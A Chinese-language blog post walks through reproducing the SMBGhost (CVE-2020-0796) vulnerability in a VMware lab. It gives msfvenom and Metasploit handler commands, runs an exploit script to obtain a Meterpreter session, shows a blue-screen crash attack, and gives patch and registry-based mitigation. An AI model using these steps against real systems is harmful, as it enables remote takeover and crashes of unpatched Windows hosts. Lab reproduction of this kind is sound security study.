CVE-­2020­-0796(永恆之黑)漏洞復現Getshell

MySQL數據庫從入門到實戰應用


CVE-­2020­-0796

Microsoft服務器消息塊3.1.1(SMBv3)協議處理某些請求的方式中存在一個遠程執行代碼漏洞。成功利用此漏洞的攻擊者可以獲得在目標服務器或客戶端上執行代碼的能力。

受影響的系統版本

適用於32位系統的Windows 10版本1903
Windows 10 1903版(用於基於x64的系統)
Windows 10 1903版(用於基於ARM64的系統)
Windows Server 1903版(服務器核心安裝)
適用於32位系統的Windows 10版本1909
Windows 10版本1909(用於基於x64的系統)
Windows 10 1909版(用於基於ARM64的系統)
Windows Server版本1909(服務器核心安裝)

環境搭建

我用的是VMware搭建
在這裏插入圖片描述
環境版本信息
在這裏插入圖片描述

漏洞檢測-掃描

工具下載:
CSDN
GitHub
在這裏插入圖片描述

漏洞復現-返回會話

工具下載:
CSDN
GItHub
該Exp使用python3
1.啓動msf
使用msf生成shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt

在這裏插入圖片描述
執行該命令後會在桌面生成一個shellcode.txt
將生成的shellcode替換exp中的exploit.py中的USER_PAYLOAD保存即可。在這裏插入圖片描述
2.使用kaili中的msf開啓監聽

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp #設置反彈模式
msf5 exploit(multi/handler) > set rhost 172.18.9.24
msf5 exploit(multi/handler) > set lport 3333 #設置監聽端口 端口需與上面生成的shellcode一致
msf5 exploit(multi/handler) > run
在這裏插入圖片描述
3.在kali Exp文件夾下執行
python3 exploit.py -ip 172.18.9.24
在這裏插入圖片描述
4.獲得會話 復現成功在這裏插入圖片描述在這裏插入圖片描述
在這裏插入圖片描述

漏洞復現-藍屏攻擊

工具下載
CSDN
在這裏插入圖片描述
目標主機藍屏
在這裏插入圖片描述

視頻演示

Getshell
https://www.bilibili.com/video/BV1ZK4y1x7JL/

漏洞修復

下載補丁並安裝補丁鏈接
也可以使用PowerShell命令禁用SMBv3服務的壓縮
Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” DisableCompression -Type DWORD -Value 1 –Force

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章